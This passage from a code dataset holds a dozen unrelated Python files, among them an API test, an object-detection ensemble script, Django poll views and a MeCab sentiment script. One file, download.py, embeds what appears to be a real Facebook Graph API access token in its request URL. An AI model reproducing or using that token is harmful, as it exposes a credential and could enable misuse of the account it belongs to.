' ✓',\n 'authenticity_token': self.csrf,\n 'plans[0][customer_id]': self.testAddCustomer.add_customers(),\n 'plans[0][contract_id]': self.testAddContract.add_contracts(),\n 'plans[0][receive_stage]': '1',\n 'plans[0][receive_date]': '2018-08-01',\n 'plans[0][amount]': '4500',\n 'plans[0][note]':''\n\n }\n response = self.common.post_response_json(url, body, 'Add received-payment plan, api: ' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n # Get the received-payment plan id\n def received_payment_plan_id_get(self, contract_id,):\n url = self.base_url +'contracts/%s?tab=tab_received_payments' %contract_id\n body ={}\n response = self.common.get_response_json(url, body, 'Get received-payment plan id, api: ' + url)\n self.response = response\n S = self.response.text\n soup = BeautifulSoup(S, 'html.parser')\n received_payment_plan_id = re.findall(r\"received_payment_plan_id: (.*?),\", str(soup))\n return received_payment_plan_id\n\n # Get the received-payment plan id from the received-payment page\n def received_payment_plan_id_get_page(self):\n url = self.base_url + 'received_payment_center/received_payment_plans?scope=received_payment_plans&per_page=10&type=advance&section_only=true'\n body = {}\n response = self.common.get_response_json(url, body, 'Get received-payment plan id, api: ' + url)\n self.response = response\n S = self.response.text\n soup = BeautifulSoup(S, 'html.parser')\n # print (str(soup))\n received_payment_plan_id = re.findall(r\"data-id=\\\"(.*?)\\\">\", str(soup))\n return received_payment_plan_id\n\n # Add a new received-payment record\n def add_received_payments(self, contract_id,receive_date ='2018-06-22',amount ='2000',customer_id =''):\n url = self.base_url 
+'api/received_payments'\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'request_ticket': self.common.get_random_int(9999999999999),\n 'contract_id': contract_id,\n 'received_payment[receive_date]': receive_date,\n 'received_payment[amount]': amount,\n 'received_payment[customer_id]': customer_id,\n 'received_payment[contract_id]': contract_id,\n 'received_payment[received_payment_plan_id]': self.received_payment_plan_id_get_page()[0],\n 'received_payment[payment_type]': '',\n 'received_payment[received_types]': '',\n 'received_payment[receive_user_id]': self.user.getMyUserId(),\n 'received_payment[note]': 'remark',\n }\n response = self.common.post_response_json(url, body, 'Add received-payment record, api: ' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n # Add a new invoice record\n def add_invoiced_payments(self, contract_id):\n url = self.base_url + 'api/invoiced_payments'\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'invoiced_payment[amount]': '2000',\n 'invoiced_payment[invoice_types]': '205671',\n 'invoiced_payment[invoice_no]': '',\n 'invoiced_payment[note]': 'remark',\n 'invoiced_payment[invoiced_date]': '2018-06-23',\n 'invoiced_payment[broker_user_id]': self.user_id,\n 'invoiced_payment[content]': 'invoice %s' % self.common.get_random_int(99999),\n }\n response = self.common.post_response_json(url, body, 'Add invoice record, api: ' + url)\n if not response:\n return {}\n self.response = response\n invoiced_payment_id = self.response.json()['data']['id']\n return invoiced_payment_id","sub_path":"testCase/received_payment_center/testAddReceivedPayments.py","file_name":"testAddReceivedPayments.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418221618","text":"import time\n\nfrom ActionsPage import ActionsPage\nfrom EditAxis import EditAxis\n\nfrom selenium.common.exceptions import NoSuchElementException\n\n\nclass EditAxisPopUp(ActionsPage):\n\n def __init__(self, driver, server):\n super(EditAxisPopUp, self).__init__(driver, server)\n self.edit_axis = EditAxis(driver, None)\n\n def _validate_page(self):\n edit_axis_locator = \"//div[@class='modal-header']/h5[contains(text(), 'Edit')]\"\n print(\"...EditAxisPopUp.validate_page()...\")\n try:\n self.find_element_by_xpath(edit_axis_locator, \"'Edit' header\")\n except NoSuchElementException as e:\n print(\"Not finding 'Edit Axis' pop up\")\n raise e\n\n def adjust_var_axes_slider(self, var, axis_title, min_offset_percent, max_offset_percent):\n self.edit_axis.adjust_var_axes_slider(var, axis_title,\n min_offset_percent, max_offset_percent)\n\n def click_on_update(self):\n print(\"...click on 'Update' button on the 'Edit Axis' pop up\")\n update_class = \"varmini-update-btn-vcdat\"\n try:\n update_button = self.find_element_by_class(update_class,\n \"'Update' button on 'Edit Axis' pop up\")\n self.move_to_click(update_button)\n time.sleep(self._delay)\n except NoSuchElementException as e:\n print(\"FAIL...EditAxisPopUp.click_on_update\")\n raise e\n","sub_path":"tests/PageObjects/EditAxisPopUp.py","file_name":"EditAxisPopUp.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62874137","text":"import time, argparse\nfrom tqdm import tqdm\nimport os, cv2\nimport json\nimport mmcv\nimport glob \nimport torch\nfrom mmdet.datasets import (build_dataloader, 
build_dataset,\n replace_ImageToTensor)\nfrom mmdet.models import build_detector\nfrom mmcv.runner import wrap_fp16_model, load_checkpoint\nfrom mmcv.cnn import fuse_conv_bn\nfrom mmcv import Config\nfrom mmcv.parallel import MMDataParallel\nfrom ensemble_boxes import *\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='json2submit_nms')\n parser.add_argument('--jsonfile', default='bbox-val.json', help='submit_file_name', type=str)\n args = parser.parse_args()\n return args\n\nunderwater_classes = ['Crack', 'Manhole', 'Net', 'Pothole', 'Patch-Crack', 'Patch-Net',\n 'Patch-Pothole', 'other']\n\ndef post_predictions(predictions, img_shape):\n bboxes_list, scores_list, labels_list = [], [], []\n for i, bboxes in enumerate(predictions):\n if len(bboxes) > 0:\n detect_label = i\n for bbox in bboxes:\n xmin, ymin, xmax, ymax, score = bbox.tolist()\n\n xmin /= img_shape[1]\n ymin /= img_shape[0]\n xmax /= img_shape[1]\n ymax /= img_shape[0]\n bboxes_list.append([xmin, ymin, xmax, ymax])\n scores_list.append(score)\n labels_list.append(detect_label)\n\n return bboxes_list, scores_list, labels_list\n \ndef main():\n args = parse_args()\n config_file1 = './ensemble_configs/cascade_rcnn_r50_rfp_carafe_sac.py' # detectors_r50\n checkpoint_file1 = './ensemble_configs/cas-0bd921e5.pth' \n config_file2 = './ensemble_configs/cascade_rcnn_s101_dcn_fpn.py' # s101\n checkpoint_file2 = './ensemble_configs/s101_20-bd7b757b.pth'\n config_file3 = './ensemble_configs/cascade_rcnn_r2_101_dcn_fpn.py' # r2_101\n checkpoint_file3 = './ensemble_configs/r2_101_20-487bd3ea.pth'\n config_file4 = './ensemble_configs/cascade_rcnn_r101_dcn_fpn.py' # r101\n checkpoint_file4 = './ensemble_configs/r101_20-db83ab64.pth'\n config_file5 = './ensemble_configs/cascade_rcnn_x101_32x4d_dcn_fpn.py' # x101_32x4d\n checkpoint_file5 = './ensemble_configs/x101_32x4d_20-f11fb360.pth'\n config_file6 = './ensemble_configs/cascade_rcnn_swin_small_fpn.py' # swin_small\n checkpoint_file6 = './ensemble_configs/swin_small_e20-0df8a664.pth'\n \n device = 'cuda:0'\n cfg1 = Config.fromfile(config_file1)\n cfg2 = Config.fromfile(config_file2)\n cfg3 = Config.fromfile(config_file3)\n cfg4 = Config.fromfile(config_file4)\n cfg5 = Config.fromfile(config_file5)\n cfg6 = Config.fromfile(config_file6)\n \n # build model\n # model1\n model1 = build_detector(cfg1.model, test_cfg=cfg1.get('test_cfg'))\n load_checkpoint(model1, checkpoint_file1, map_location=device)\n # model2\n model2 = build_detector(cfg2.model, test_cfg=cfg2.get('test_cfg'))\n load_checkpoint(model2, checkpoint_file2, map_location=device)\n # model3\n model3 = build_detector(cfg3.model, test_cfg=cfg3.get('test_cfg'))\n load_checkpoint(model3, checkpoint_file3, map_location=device)\n # model4\n model4 = build_detector(cfg4.model, test_cfg=cfg4.get('test_cfg'))\n load_checkpoint(model4, checkpoint_file4, map_location=device)\n # model5\n model5 = build_detector(cfg5.model, test_cfg=cfg5.get('test_cfg'))\n load_checkpoint(model5, checkpoint_file5, map_location=device)\n # model6\n model6 = build_detector(cfg6.model, test_cfg=cfg6.get('test_cfg'))\n load_checkpoint(model6, checkpoint_file6, map_location=device)\n \n test_json_raw = json.load(open(cfg1.data.test.ann_file))\n imgid2name = {}\n for imageinfo in test_json_raw['images']:\n imgid = imageinfo['id']\n imgid2name[imageinfo['file_name']] = imgid\n wrap_fp16_model(model1) # use fp16 to speed up inference\n wrap_fp16_model(model2)\n wrap_fp16_model(model3)\n wrap_fp16_model(model4)\n wrap_fp16_model(model5)\n wrap_fp16_model(model6)\n \n # 
build the dataloader\n samples_per_gpu = cfg1.data.test.pop('samples_per_gpu', 1) # aug_test does not support batch_size > 1\n dataset = build_dataset(cfg1.data.test)\n data_loader = build_dataloader(\n dataset,\n samples_per_gpu=samples_per_gpu,\n workers_per_gpu=4,\n dist=False,\n shuffle=False)\n model1 = MMDataParallel(model1, device_ids=[0]) # why is this needed? (it breaks without it)\n model2 = MMDataParallel(model2, device_ids=[0])\n model3 = MMDataParallel(model3, device_ids=[0])\n model4 = MMDataParallel(model4, device_ids=[0])\n model5 = MMDataParallel(model5, device_ids=[0])\n model6 = MMDataParallel(model6, device_ids=[0])\n model1.eval()\n model2.eval()\n model3.eval()\n model4.eval()\n model5.eval()\n model6.eval()\n \n json_results = []\n dataset = data_loader.dataset\n prog_bar = mmcv.ProgressBar(len(dataset))\n for i, data in enumerate(data_loader):\n with torch.no_grad():\n result1 = model1(return_loss=False, rescale=True, **data)\n result2 = model2(return_loss=False, rescale=True, **data)\n result3 = model3(return_loss=False, rescale=True, **data)\n result4 = model4(return_loss=False, rescale=True, **data)\n result5 = model5(return_loss=False, rescale=True, **data)\n result6 = model6(return_loss=False, rescale=True, **data)\n batch_size = len(result1)\n assert len(result1) == len(result2)\n \n result1 = result1[0] # only one image is fed per batch\n result2 = result2[0]\n result3 = result3[0]\n result4 = result4[0]\n result5 = result5[0]\n result6 = result6[0]\n img_metas = data['img_metas'][0].data[0]\n img_shape = img_metas[0]['ori_shape']\n bboxes, scores, labels = post_predictions(result1, img_shape)\n e_bboxes, e_scores, e_labels = post_predictions(result2, img_shape)\n e_bboxes3, e_scores3, e_labels3 = post_predictions(result3, img_shape)\n e_bboxes4, e_scores4, e_labels4 = post_predictions(result4, img_shape)\n e_bboxes5, e_scores5, e_labels5 = post_predictions(result5, img_shape)\n e_bboxes6, e_scores6, e_labels6 = post_predictions(result6, img_shape)\n bboxes_list = [bboxes, e_bboxes, e_bboxes3, e_bboxes4, e_bboxes5, e_bboxes6]\n scores_list = [scores, e_scores, e_scores3, e_scores4, e_scores5, e_scores6]\n labels_list = [labels, e_labels, e_labels3, e_labels4, e_labels5, e_labels6]\n bboxes, scores, labels = weighted_boxes_fusion(\n bboxes_list,\n scores_list,\n labels_list,\n weights=[1.5, 1, 1, 1, 1, 1],\n iou_thr=0.6,\n skip_box_thr=0.0001,\n conf_type='avg')\n# basename = img_metas[0]['ori_filename']\n# image = cv2.imread(os.path.join(cfg1.data.test.img_prefix, basename))\n for (box, score, label) in zip(bboxes, scores, labels):\n xmin, ymin, xmax, ymax = box.tolist()\n xmin, ymin, xmax, ymax = round(\n float(xmin) * img_shape[1],\n 2), round(float(ymin) * img_shape[0],\n 2), round(float(xmax) * img_shape[1],\n 2), round(float(ymax) * img_shape[0], 2)\n data = dict()\n data['image_id'] = imgid2name[img_metas[0]['ori_filename']]\n data['bbox'] = [xmin, ymin, xmax-xmin, ymax-ymin]\n data['score'] = float(score)\n data['category_id'] = label+1\n json_results.append(data)\n# if score >= 0.1:\n# cv2.rectangle(image, (int(xmin), int(ymin)), (int(xmax), int(ymax)), (255, 255, 0), 2)\n# cv2.putText(image, underwater_classes[int(label)] + ' ' + str(round(score, 5)),\n# (int(xmin), int(ymin - 2)),\n# cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0), thickness=2\n# )\n# cv2.imwrite(os.path.join('val_img', basename), image)\n for _ in range(batch_size):\n prog_bar.update()\n mmcv.dump(json_results, args.jsonfile)\n \n\nif __name__ == \"__main__\":\n 
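# An illustrative aside (not part of the original script): weighted_boxes_fusion\n # expects per-model lists of boxes normalized to [0, 1], plus scores and labels;\n # e.g. for two models voting on roughly the same object:\n #   b, s, l = weighted_boxes_fusion([[[.1, .1, .5, .5]], [[.12, .1, .5, .52]]],\n #                                   [[0.9], [0.8]], [[0], [0]], iou_thr=0.6)\n 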
main()","sub_path":"code/tools/post_process/test_ensemble.py","file_name":"test_ensemble.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584638785","text":"import requests\n\n\nr = requests.get(\n 'https://graph.facebook.com/123103684386135/posts?access_token=CAADVtJqGBj8BALYd0MZCzc2WshZAFFrmyhUxA8HZAkzwZBfVlBtE6U8jOpApLs0vW04Ss2qL3tK81K5JewgsiExZAExB3FlUPDizR3U5CZBlZCpZBYptVKqsmScEktw82bZAfUaj2kgSZB9CZAsgEBFr8rttZBDFdOzXaeYKumQsk2AUI8h9HeAuaIPMgJXLLSJdXbIZAVuEXq23gMedeTr72p0SOZCFBCteLZCRUeexcZAH1gCEIAZDZD'\n)\n\nn = 0\n\nfor i, post in enumerate(r.json().get('data')):\n if post.get('type') == 'photo':\n r2 = requests.get(post.get('picture').replace('_s', '_a'))\n with open('images/photo{}.jpg'.format(n), 'wb') as f:\n f.write(r2.content)\n n += 1\n\n if n >= 6:\n break\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312658230","text":"import numpy as np\r\nimport csv\r\nwith open(\"C:\\\\Users\\\\Sahil\\\\Downloads\\\\terrorismData.csv\" , encoding ='UTF-8') as file_obj:\r\n # csv_obj=csv.reader(file_obj)\r\n csv_obj = csv.DictReader(file_obj,skipinitialspace=True)\r\n # list1=list(csv_obj)\r\n\r\n killed=list()\r\n for row in csv_obj:\r\n if row['Country']=='United States':\r\n killed.append(row['Killed'])\r\n\r\n np_killed=np.array(killed)\r\n np_killed[np_killed=='']='0.0'\r\n np_killed=np.array(np_killed , dtype=float)\r\n print(int(np.sum(np_killed)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Jupyter_notebook/numpy/totak_killed_in_usa.py","file_name":"totak_killed_in_usa.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632945265","text":"import math\n\nf_in = open('C-large-1.in', 'r')\nf_out = open('C-large-1.out', 'w')\n\nnum_cases = int(f_in.readline().strip())\n\nfor idx_case in range(num_cases):\n A_B_list = f_in.readline().strip().split()\n num_digits_A = len(A_B_list[0])\n num_digits_B = len(A_B_list[1])\n A = int(A_B_list[0])\n B = int(A_B_list[1])\n \n num_fair_and_square = 0\n \n # n is the smaller palindrome, n_sq is the larger palindrome\n for num_digits_n in range((num_digits_A + 1) / 2, (num_digits_B + 3) / 2):\n num_digits_m = (num_digits_n + 1) / 2\n for m in range(10 ** (num_digits_m - 1), 10 ** num_digits_m):\n if num_digits_n % 2 == 0:\n n = int(str(m) + str(m)[::-1])\n else:\n n = int(str(m) + str(m)[-2::-1])\n n_sq = n * n\n if n_sq >= A and n_sq <= B and str(n_sq) == str(n_sq)[::-1]:\n num_fair_and_square += 1\n \n f_out.write('Case #{}: {}\\n'.format(idx_case+1, num_fair_and_square))\n\nf_in.close()\nf_out.close()","sub_path":"solutions_2463486_1/Python/UgglyNoodle/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504805940","text":"from turtle_forward_dfa import ForwardDataflowAnalysis\n\nclass Dominators(ForwardDataflowAnalysis):\n def universal(self, node):\n if node.prev:\n return set((n.idx for n in self.cfg))\n else:\n return set([node.idx])\n\n def conf(self, a, b):\n return set.intersection(a,b)\n\n def gen(self, node):\n return set([node.idx])\n\n def kill(self, node):\n return set()\n\ndef get_idoms(cfg, doms):\n idoms = {}\n\n for node in cfg:\n visited = set()\n q = [node]\n while 
len(q) > 0:\n curr = q.pop()\n\n if curr.idx not in visited:\n visited.add(curr.idx)\n\n if curr.idx in doms[node] and curr.idx != node.idx:\n idoms[node] = curr\n break\n else:\n q = curr.prev + q\n\n return idoms\n\ndef get_df(cfg, idom):\n df = {}\n\n for node in cfg:\n df[node.idx] = set()\n\n for node in cfg:\n if len(node.prev) > 1:\n for pred in node.prev:\n runner = pred\n while runner != idom[node]:\n df[runner.idx].add(node.idx)\n runner = idom[runner]\n\n return df\n","sub_path":"compiler/turtle_dominator.py","file_name":"turtle_dominator.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420887549","text":"import os.path\nimport os\nimport requests\nimport sys\nimport sqlite3 as sql\nimport datetime\nimport json\nimport socket\nimport hashlib\nfrom models import image_model\nfrom PIL import Image\n\ndef compute_average_image_color(img):\n width, height = img.size\n\n r_total = 0\n g_total = 0\n b_total = 0\n\n count = 0\n for x in range(0, width):\n for y in range(0, height):\n r, g, b = img.getpixel((x,y))\n r_total += r\n g_total += g\n b_total += b\n count += 1\n\n return (r_total/count, g_total/count, b_total/count)\n\n# OBJECTS DATABASE OPERATIONS\ndef all_objects_name():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT id,class,confidence from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"confidence\" : obj[2]\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected_name(name):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n if(obj[1].lower() == name.lower()):\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected_name_color(name, color):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n if(obj[1].lower() == name.lower()):\n obj_img = Image.open('resources/images/objs/' + obj[2])\n avarage_colors = compute_average_image_color(obj_img)\n dominant_color_value = max(avarage_colors)\n\n for i in range (0, len(avarage_colors)):\n if dominant_color_value == avarage_colors[i]:\n if i == 0:\n dominant_color_name = 'red'\n elif i == 1:\n dominant_color_name = 'green'\n else:\n dominant_color_name = 'blue'\n \n if color.lower() == dominant_color_name:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\n\ndef 
search_objects_by_image_id(image_id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE image_id = ?\"\n db.execute(str(statement), (image_id,))\n result = db.fetchall()\n db.close()\n return json.dumps(result)\n\ndef search_objects_by_id(id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE image = ?\"\n db.execute(str(statement), (id,))\n result = db.fetchone()\n db.close()\n json_result = []\n if not result:\n return 0\n else:\n json_result.append(\n {\n \"id\" : result[0], \n \"class\" : result[1],\n \"name\" : result[2],\n \"image\" : result[3],\n \"confidence\" : result[4],\n \"original\" : result[5],\n }\n )\n return json.dumps(json_result)\n\ndef search_objects_by_name(name):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE class = ?\"\n db.execute(str(statement), (name,))\n result = db.fetchall()\n db.close()\n return json.dumps(result)\n\ndef insert_new_object(obj, path, original, image):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"INSERT INTO objects (class, name, image, confidence, original, created_at) VALUES (?, ?, ?, ?, ?, ?)\"\n curDateTime = datetime.datetime.now().replace(microsecond=0)\n data = (str(obj[\"class\"]), str(path), str(image), str(round(obj['confidence'] * 100)) ,str(original), str(curDateTime))\n db.execute(str(statement), data)\n con.commit()\n con.close()\n\ndef delete_object(id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n '''statement = \"SELECT image,original FROM objects WHERE id = ?\"\n db.execute(str(statement), (id,))\n file_name = db.fetchall()\n \n statement = \"SELECT name FROM objects WHERE original = ?\"\n db.execute(str(statement), (file_name[1],))\n count = len(db.fetchall())\n \n if count == 1:\n delete_file(\"original/\" + file_name[1])\n \n delete_file(\"objs/\" + file_name[0])'''\n \n\n statement = \"DELETE FROM objects WHERE id = ?\"\n db.execute(str(statement), (id,))\n con.commit()\n con.close()\n \n\ndef delete_file(file_name):\n os.remove(\"/resources/images/\" + file_name)\n\ndef delete_all():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n\n statement = \"DELETE FROM objects\"\n db.execute(str(statement))\n \n con.commit()\n con.close()\n return 'success'\n\ndef edit(id, obj, confidence): #obj -> class\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"UPDATE objects SET class = ?, confidence = ? 
WHERE image = ?\"\n db.execute(str(statement), (str(obj), str(confidence), str(id)),)\n con.commit()\n con.close()\n return 'success'","sub_path":"labi2019-p2-g12/models/object_model.py","file_name":"object_model.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"185773560","text":"class Solution:\n def reverseStr(self, s: str, k: int) -> str:\n def reverse(low, high):\n while low < high:\n arr[low], arr[high] = arr[high], arr[low]\n low += 1\n high -= 1\n arr = list(s)\n i = 0\n while i < len(s):\n reverse(i, min(i+k-1, len(arr) - 1))\n i += k*2\n return ''.join(arr)\n","sub_path":"Week_09/反转字符串II.py","file_name":"反转字符串II.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426388876","text":"\"\"\"\nclick_shell.version\n\"\"\"\n\n# pylint: disable=redefined-variable-type\n\nimport datetime\nimport os\nimport subprocess\n\n\nVERSION = (2, 0, 0, 'dev', 0)\n\n\ndef get_version(version):\n \"\"\"\n Returns a PEP 440-compliant version number from VERSION.\n\n Created by modifying django.utils.version.get_version\n \"\"\"\n\n # Now build the two parts of the version number:\n # major = X.Y[.Z]\n # sub = .devN - for development releases\n # | {a|b|rc}N - for alpha, beta and rc releases\n # | .postN - for post-release releases\n\n assert len(version) == 5\n\n version_parts = version[:2] if version[2] == 0 else version[:3]\n\n # Build the first part of the version\n major = '.'.join(str(x) for x in version_parts)\n\n # Just return it if this is a final release version\n if version[3] == 'final':\n return major\n\n # Add the rest\n sub = ''.join(str(x) for x in version[3:5])\n\n if version[3] == 'dev':\n # Override the sub part. 
Add in a timestamp\n timestamp = get_git_changeset()\n sub = 'dev%s' % (timestamp if timestamp else version[4])\n return '%s.%s' % (major, sub)\n if version[3] == 'post':\n # We need a dot for post\n return '%s.%s' % (major, sub)\n elif version[3] in ('a', 'b', 'rc'):\n # No dot for these\n return '%s%s' % (major, sub)\n else:\n raise ValueError('Invalid version: %s' % str(version))\n\n\n# Borrowed directly from django\ndef get_git_changeset():\n \"\"\"Returns a numeric identifier of the latest git changeset.\n\n The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.\n This value isn't guaranteed to be unique, but collisions are very unlikely,\n so it's sufficient for generating the development version numbers.\n \"\"\"\n repo_dir = os.path.dirname(os.path.abspath(__file__))\n git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n shell=True, cwd=repo_dir, universal_newlines=True)\n timestamp = git_log.communicate()[0]\n try:\n timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))\n return timestamp.strftime('%Y%m%d%H%M%S')\n except ValueError:\n return None\n\n__version__ = get_version(VERSION)\n","sub_path":"click_shell/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242123025","text":"from typing import Union\n\nfrom ..call_builder import BaseCallBuilder\nfrom ..client.base_async_client import BaseAsyncClient\nfrom ..client.base_sync_client import BaseSyncClient\n\n\nclass OffersCallBuilder(BaseCallBuilder):\n \"\"\" Creates a new :class:`OffersCallBuilder` pointed to server defined by horizon_url.\n Do not create this object directly, use :func:`stellar_sdk.server.Server.offers`.\n\n See `Offers for Account `_\n\n :param horizon_url: Horizon server URL.\n :param client: The client instance used to send request.\n :param account_id: Account ID.\n \"\"\"\n\n def __init__(\n self,\n horizon_url: str,\n client: Union[BaseAsyncClient, BaseSyncClient],\n account_id: str,\n ) -> None:\n super().__init__(horizon_url, client)\n self.endpoint: str = \"accounts/{account_id}/offers\".format(\n account_id=account_id\n )\n","sub_path":"stellar_sdk/call_builder/offers_call_builder.py","file_name":"offers_call_builder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574304805","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*-\n\nimport sys\nimport re\nimport datetime\nimport time\nimport MeCab\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 2:\n print (\"Usage: \",sys.argv[0], \"filename\")\n quit()\n\n filename = sys.argv[1] # e.g. tweet.1.txt\n\n f = open(filename)\n #f = open(filename)\n line = f.readline().rstrip()\n days = {} # key -> date, value -> all of that day's tweets joined into one string (tweets separated by '。', roughly)\n days_count = {} # key -> date, value -> number of tweets on that day\n\n while line:\n air = line.split(\" \")\n hu = line.split(\" JST \")\n hurf = re.sub(re.compile(\"[!-~]\"), '', hu[1])\n\n if air[0] not in days:\n days[air[0]] = hurf\n days_count[air[0]] = 1\n else:\n days[air[0]] = days[air[0]] + hurf\n days_count[air[0]] += 1\n line = f.readline().rstrip()\n\n #print (\"2014-11-25 tweet count \"+str(days_count[\"2014-11-25\"])+\"\\n\"+days[\"2014-11-25\"]+\"\\n\")\n #print (\"2014-11-26 tweet count \"+str(days_count[\"2014-11-26\"])+\"\\n\"+days[\"2014-11-26\"]+\"\\n\")\n f.close()\n mecab = MeCab.Tagger('-Ochasen')\n 
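# Aside (a hedged note, not in the original source): MeCab's parseToNode returns a\n # linked list of morphemes; each node.feature is a comma-separated string whose\n # first field is the part of speech, which the loop below matches against.\n 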
node = mecab.parseToNode(days[\"2014-11-26\"]) # parse the text into morpheme nodes\n\n ld = open(\"pnName.txt\" ) # load the positive/negative noun dictionary\n names = ld.readlines()\n\n\n days_score = {} # average negative/positive score for the day\n score = 0\n num_score = 0\n while node:\n fs = node.feature.split(\",\")\n #print(node.surface, node.feature, sep='\\t')\n #print(node.surface)\n if fs[0] == \"名詞\": # '名詞' is MeCab's POS tag for nouns\n \n for name in names:\n \n if name.find(node.surface) >= 0:\n nm = re.split(r'[\\t]', name)\n if node.surface == nm[0]:\n #print (nm[0]+\" \"+nm[1])\n if nm[1] == 'p': score = 1.0\n elif nm[1] == 'e': score = 0.5\n elif nm[1] == 'n': score = 0.0\n num_score += score\n\n node = node.next\n\n days_score[\"2014-11-26\"] = num_score/days_count[\"2014-11-26\"]\n\n print (days_score[\"2014-11-26\"])\n\n ld.close()\n","sub_path":"old_file/line1.py","file_name":"line1.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194804653","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.datastructures import MultiValueDictKeyError\n\nfrom .models import Question, Choice\n\n#1. view of all published questions\ndef index(request):\n questions = Question.objects.all()\n title = 'List of all questions'\n\n context = {\n 'questions': questions,\n 'title': title,\n }\n\n return render(request,'polls/index.html', context)\n\n#2. 
detail view for a single question\ndef detail(request, question_id):\n #question = Question.objects.get(id = question_id)\n question = get_object_or_404(Question, id = question_id)\n title = f'Question: {question.question_text}'\n\n context = {\n 'question': question,\n 'title': title,\n }\n\n return render(request,'polls/detail.html', context)\n\n\n#3. view that handles a user's vote\ndef vote(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n\n # if request.method == \"POST\": # removed, since below we use .get() so missing values come back empty\n # choice_form = request.POST['choice']\n choice_form = request.POST.get('choice')\n # if the key is absent, this returns None instead of raising\n\n # try:\n # choice_form = request.POST['choice']\n # except MultiValueDictKeyError:\n # return redirect('polls:detail', question_id)\n\n try:\n selected_choice = question.choice_set.get(id=choice_form)\n except Choice.DoesNotExist:\n return redirect('polls:detail', question_id)\n\n selected_choice.votes += 1\n selected_choice.save()\n\n return redirect('polls:results', question_id)\n\n#4. results view for a given question\ndef results(request, question_id):\n #question = Question.objects.get(id = question_id)\n question = get_object_or_404(Question, id = question_id)\n title = f'Results: {question.question_text}'\n\n context = {\n 'question': question,\n 'title': title,\n }\n\n return render(request,'polls/results.html', 